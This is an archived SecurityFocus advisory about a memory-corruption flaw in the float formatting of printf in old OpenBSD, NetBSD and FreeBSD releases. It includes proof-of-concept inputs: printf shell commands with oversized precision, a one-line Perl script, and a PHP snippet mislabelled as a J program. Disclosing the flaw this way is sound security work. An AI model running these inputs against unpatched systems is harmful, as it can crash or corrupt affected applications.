29 lines
No EOL
828 B
Text
29 lines
No EOL
828 B
Text
source: https://www.securityfocus.com/bid/35510/info
|
|
|
|
Multiple BSD distributions are prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.
|
|
|
|
Attackers may exploit this issue to execute arbitrary code within the context of affected applications.
|
|
|
|
The following are vulnerable:
|
|
|
|
OpenBSD 4.5
|
|
NetBSD 5.0
|
|
FreeBSD 6.4 and 7.2
|
|
|
|
Other software based on the BSD code base may also be affected.
|
|
|
|
The following proof-of-concept shell commands are available:
|
|
|
|
printf %1.262159f 1.1
|
|
printf %11.2109999999f
|
|
printf %11.2009999999f
|
|
printf %11.2009999999f
|
|
|
|
The following proof-of-concept Perl script is available:
|
|
|
|
#!/usr/local/bin/perl
|
|
printf "%0.4194310f", 0x0.0x41414141;
|
|
|
|
The following proof-of-concept J program is available:
|
|
|
|
cxib=0.<?php echo str_repeat("1",296450); ?> |